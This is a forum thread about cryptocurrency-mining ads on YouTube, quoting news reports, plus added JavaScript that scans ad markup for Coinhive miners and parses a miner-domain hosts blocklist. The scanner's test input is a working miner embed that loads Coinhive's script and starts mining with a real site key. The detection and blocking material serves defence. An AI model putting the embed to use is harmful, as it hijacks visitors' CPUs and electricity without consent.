Now even YouTube serves ads with CPU-draining cryptocurrency miners

Flengo

Level 2
Thread author
Verified
Oct 19, 2017
52
Ad campaign lets attackers profit while unwitting users watch videos.

YouTube was recently caught displaying ads that covertly leech off visitors' CPUs and electricity to generate digital currency on behalf of anonymous attackers, it was widely reported.

Word of the abusive ads started no later than Tuesday, as people took to social media sites to complain their antivirus programs were detecting cryptocurrency mining code when they visited YouTube. The warnings came even when people changed the browser they were using, and the warnings seemed to be limited to times when users were on YouTube.

Great, now my browser every time I watch YouTube... my antivirus always blocking Coinhive because malware. Idk much about it but this is getting annoying and I need a solution please T n T

— Arung (@ArungLaksmana) January 23, 2018

Hey @avast_antivirus seems that you are blocking crypto miners (#coinhive) in @YouTube #ads
Thank you :)
[Linked post: Crypto Miner (Coinhive) in YouTube Ads | Diego Betto]

— Diego Betto (@diegobetto) January 25, 2018

Apparently @YouTube is very funny, and it wasn't enough for them to cut our audience; now they go and inject the Coinhive JavaScript on us to use our devices to mine Monero! Seriously, @Google! What the heck are you doing with YouTube?? pic.twitter.com/NzMUMlArJs

— ᛗᛟErvoᛟᛗ (@Mystic_Ervo) January 24, 2018

On Friday, researchers with antivirus provider Trend Micro said the ads helped drive a more than three-fold spike in Web miner detections. They said the attackers behind the ads were abusing Google's DoubleClick ad platform to display them to YouTube visitors in select countries, including Japan, France, Taiwan, Italy, and Spain.

The ads contain JavaScript that mines the digital coin known as Monero. In nine out of 10 cases, the ads will use publicly available JavaScript provided by Coinhive, a cryptocurrency-mining service that's controversial because it allows subscribers to profit by surreptitiously using other people's computers. The remaining 10 percent of the time, the YouTube ads use private mining JavaScript that saves the attackers the 30 percent cut Coinhive takes. Both scripts are programmed to consume 80 percent of a visitor's CPU, leaving just barely enough resources for it to function.

"YouTube was likely targeted because users are typically on the site for an extended period of time," independent security researcher Troy Mursch told Ars. "This is a prime target for cryptojacking malware, because the longer the users are mining for cryptocurrency the more money is made." Mursch said a campaign from September that used the Showtime website to deliver cryptocurrency-mining ads is another example of attackers targeting a video site.

To add insult to injury, the malicious JavaScript in at least some cases was accompanied by graphics that displayed ads for fake AV programs, which scam people out of money and often install malware when they are run.

[Image: screenshot of the ad]

The above ad was posted on Tuesday. Like the ads analyzed by Trend Micro and posted on social media, it mined Monero coins on behalf of someone with the Coinhive site key of "h7axC8ytzLJhIxxvIHMeC0Iw0SPoDwCK." It's not possible to know how many coins the user has generated so far. Trend Micro said the campaign started January 18. In an e-mail sent as this post was going live, a Google representative wrote:

Mining cryptocurrency through ads is a relatively new form of abuse that violates our policies and one that we’ve been monitoring actively. We enforce our policies through a multi-layered detection system across our platforms which we update as new threats emerge. In this case, the ads were blocked in less than two hours and the malicious actors were quickly removed from our platforms.

It wasn't clear what the representative meant when saying the ads were blocked in less than two hours. Evidence supplied by Trend Micro and on social media showed various ads containing substantially the same JavaScript ran for as long as a week. The representative didn't respond to follow-up questions seeking a timeline of when the abusive ads started and ended.

As the problem of Web-based cryptomining has surged to almost epidemic proportions, a variety of AV programs have started warning of cryptocurrency-mining scripts hosted on websites and giving users the option of blocking the activity. While drive-by cryptocurrency mining is an abuse that drains visitors' electricity and computing resources, there's no indication that it installs ransomware or other types of malware, as long as people don't click on malicious downloads.
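The article describes a fixed embed shape: a loader script pulled from a Coinhive host, a miner constructed with the publisher's site key (the key decides who gets paid), and a throttle option whose complement is the CPU share (the quoted 80% is throttle 0.2). The following is an added example, not code from the Ars article, from Coinhive or from anyone in this thread: a static scan of an ad creative's markup for that pattern. The CoinHive.Anonymous / CoinHive.User constructor names, the throttle option and the loader hostnames are taken from Coinhive's public documentation of the time; the host list and the two sample creatives are constructed for the example, and only the site key comes from the article.

```javascript
// Added example, not code from the Ars article, from Coinhive or from this thread.
// Static scan of an ad creative's markup for the Coinhive embed pattern the
// article describes. Assumptions: the CoinHive.Anonymous / CoinHive.User
// constructor and the throttle option follow Coinhive's public documentation
// of the time; MINER_HOSTS, SAMPLE_AD and CLEAN_AD are constructed for this
// example. Only the site key is taken from the article.

const MINER_HOSTS = ["coinhive.com", "coin-hive.com", "authedmine.com"];

// True when hostname is one of the listed hosts or a subdomain of one.
function hostMatches(hostname, hosts) {
  const h = hostname.toLowerCase();
  return hosts.some((b) => h === b || h.endsWith("." + b));
}

function scanForCoinhive(markup) {
  const result = { suspicious: false, loaderHosts: [], siteKey: null, cpuShare: null, reasons: [] };

  // 1. External <script src=...> loaders fetched from a known miner host.
  const srcRe = /<script[^>]*\ssrc=["']https?:\/\/([^/"'\s]+)[^"']*["']/gi;
  let m;
  while ((m = srcRe.exec(markup)) !== null) {
    if (hostMatches(m[1], MINER_HOSTS)) {
      result.loaderHosts.push(m[1].toLowerCase());
      result.reasons.push("loader script fetched from " + m[1]);
    }
  }

  // 2. Miner construction carrying a site key (the key identifies who gets paid).
  const ctorRe = /CoinHive\.(Anonymous|User)\s*\(\s*["']([A-Za-z0-9]{16,64})["']/;
  const c = ctorRe.exec(markup);
  if (c) {
    result.siteKey = c[2];
    result.reasons.push("CoinHive." + c[1] + " started with site key " + c[2]);
  }

  // 3. throttle is the fraction of time each worker idles; the CPU share is the rest.
  //    The article's 80% figure corresponds to throttle 0.2; Coinhive's documented default is 0.
  if (c) {
    const t = /throttle\s*:\s*([0-9]*\.?[0-9]+)/.exec(markup);
    const throttle = t ? Math.min(Math.max(parseFloat(t[1]), 0), 1) : 0;
    result.cpuShare = Math.round((1 - throttle) * 100);
    result.reasons.push("throttle " + throttle + " => about " + result.cpuShare + "% of each worker thread");
  }

  result.suspicious = result.reasons.length > 0;
  return result;
}

// Constructed ad creative modelled on the article's description: a fake-AV
// banner plus the miner. The site key is the one quoted in the article.
const SAMPLE_AD = `
<div class="creative"><img src="https://ads.example/fake-av-banner.png"></div>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('h7axC8ytzLJhIxxvIHMeC0Iw0SPoDwCK', { throttle: 0.2 });
  miner.start();
</script>`;

// Constructed benign creative: an image and an ordinary tracking script.
const CLEAN_AD = `
<div class="creative"><img src="https://ads.example/banner.png"></div>
<script src="https://cdn.example/tracking.js"></script>`;

console.log(scanForCoinhive(SAMPLE_AD));
console.log(scanForCoinhive(CLEAN_AD));
```

The scan is deliberately static: it runs over the creative's markup before anything executes, which is where an ad platform or a browser extension would want to catch it. It will not see the 10% of campaigns the article says used private mining code, which is why the runtime signals (sustained CPU load, a WebSocket to an unfamiliar proxy, Web Workers spawned by an ad frame) still matter.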
 

ForgottenSeer 58943

Fortinet appliances now block cryptominers. Also my Pi-Hole has cryptominer signatures now. Very handy! Also, people with Fire Sticks, my Fortinet has blocked repeated attempts to serve miner-laden updates to the Fire Stick!

BTW for those with Pi-Hole, or needing hosts, here's a list of all known coinminers, it's updated daily.

https://raw.githubusercontent.com/ZeroDot1/CoinBlockerLists/master/hosts
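As an added example (not the poster's code and not part of the CoinBlockerLists project), here is a parser for a hosts-format list like the one linked above, plus a lookup that behaves the way Pi-hole's gravity list does: it matches the domain exactly, so a subdomain is only blocked if it is itself listed, and a listed parent domain is reported separately as a hint that a wildcard regex rule is needed. The list excerpt and the hostnames looked up are constructed for the example; the real list is the file at the URL above.

```javascript
// Added example, not the poster's code and not part of the CoinBlockerLists
// project. Parses a hosts-format blocklist like the one linked above and looks
// hostnames up the way Pi-hole's gravity list does: by exact domain, so a
// subdomain is only blocked if it is itself listed. SAMPLE_HOSTS is a
// constructed excerpt, not the real list.

const SAMPLE_HOSTS = `
# CoinBlockerLists hosts (constructed excerpt for this example)
0.0.0.0 coinhive.com
0.0.0.0 coin-hive.com
0.0.0.0 authedmine.com
0.0.0.0 ws001.coinhive.com   # one proxy host listed explicitly
127.0.0.1 localhost
::1 ip6-localhost
`;

// Names that appear in hosts files for local resolution, never as blocks.
const LOCAL_NAMES = new Set([
  "localhost", "localhost.localdomain", "local", "broadcasthost",
  "ip6-localhost", "ip6-loopback", "0.0.0.0",
]);

function parseHostsList(text) {
  const blocked = new Set();
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.replace(/#.*$/, "").trim(); // drop comments and padding
    if (!line) continue;
    const [addr, ...names] = line.split(/\s+/);
    // Blocklists sinkhole to 0.0.0.0 or 127.0.0.1; anything else is not a block entry.
    if (addr !== "0.0.0.0" && addr !== "127.0.0.1") continue;
    for (const n of names) {
      const name = n.toLowerCase().replace(/\.$/, "");
      if (!LOCAL_NAMES.has(name)) blocked.add(name);
    }
  }
  return blocked;
}

// Exact match blocks. A listed parent domain does not block its subdomains in a
// hosts-style list, so that case is reported as "parent-listed" rather than blocked.
function checkHost(hostname, blocked) {
  const h = hostname.toLowerCase().replace(/\.$/, "");
  if (blocked.has(h)) return { blocked: true, how: "exact", match: h };
  const labels = h.split(".");
  for (let i = 1; i < labels.length - 1; i++) {
    const parent = labels.slice(i).join(".");
    if (blocked.has(parent)) return { blocked: false, how: "parent-listed", match: parent };
  }
  return { blocked: false, how: "none", match: null };
}

// Pi-hole regex (its documented wildcard form) that closes the subdomain gap
// for one listed domain: matches the domain itself and every subdomain.
function wildcardRegexFor(domain) {
  return "(\\.|^)" + domain.replace(/\./g, "\\.") + "$";
}

const BLOCKED = parseHostsList(SAMPLE_HOSTS);
for (const name of ["coinhive.com", "ws001.coinhive.com", "cdn.authedmine.com", "youtube.com"]) {
  console.log(name, checkHost(name, BLOCKED));
}
console.log(wildcardRegexFor("coinhive.com"));
```

The parent-listed case is the one to watch in practice: miners of this kind talked to numbered proxy hosts under the mining service's domain, and a hosts list only catches the ones its maintainer has seen. Adding the wildcard regex for each listed apex domain covers the rest at the cost of occasionally overblocking.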
 

Deleted member 65228

No wonder YouTube plays like ##### then if all resources are wasted on crypto ##### instead of decoding of the god damn video...
It doesn't apply to everyone - only if the attacker's advertising content is loaded on the web page, in which their JS is activated. It's not a situation of every video you run or every web page on YouTube, there is a crypto-currency miner active.

Bear in mind that this isn't Google's doing and they are likely working on resolving the issue. Add a good ad-blocker to your configuration in the meantime and you'll be good as golden.
 

RejZoR

Level 15
Verified
Top Poster
Well-known
Nov 26, 2016
699
It doesn't apply to everyone - only if the attacker's advertising content is loaded on the web page, in which their JS is activated. It's not a situation of every video you run or every web page on YouTube, there is a crypto-currency miner active.

Bear in mind that this isn't Google's doing and they are likely working on resolving the issue. Add a good ad-blocker to your configuration in the meantime and you'll be good as golden.

Well, I'm using Opera which has a miner blocker by default now, but still. This thing is literally the same as the decade-old cases of malware injection into a clean and trusted site via the ads on it...
 

Prorootect

Level 69
Verified
Nov 5, 2011
5,855


But a source with direct knowledge of YouTube’s handling of the situation told Gizmodo that the two-hour measurement was just being applied to each individual ad run by the hackers, not the ads en masse. YouTube approves a clean ad submitted by a clean account set up by the hijacker. When the ad goes live, the attackers use various cloaking methods to subvert YouTube’s system and swap the ad with one that includes the malicious script. A couple hours later, the ad is detected, taken down, and the user who submitted it gets their account deleted. Wash. Rinse. Repeat. To sum this up in the most generous terms, YouTube and Google’s ad network, in general, has an ongoing and ever-evolving problem on its hands.

The thing about all of this is that cryptojacking isn’t that big of a deal. Flagged instances are becoming more frequent, but the harm to your privacy or system is virtually non-existent. What sucks is that someone out there (in this case the owner of a single CoinHive site key) is using your CPU power and electricity to make money and you don’t get a cut. You’re unwittingly funding cybercrime while YouTube makes its money from serving you ads. And from a big picture perspective, security flaws are being exposed. Just because the script wasn’t particularly dangerous this time around, doesn’t mean it couldn’t be some nasty ransomware next time.

Source: gizmodo.com:
Hackers Hijacking CPUs to Mine Cryptocurrency Have Now Invaded YouTube Ads
https://gizmodo.com/hackers-hijacki..._source=gizmodo_twitter&utm_medium=socialflow

- So listen carefully to your fan!
 

kev216

Level 21
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Aug 6, 2014
1,044
They really force us to use an ad blocker these days. Long live AdGuard!
 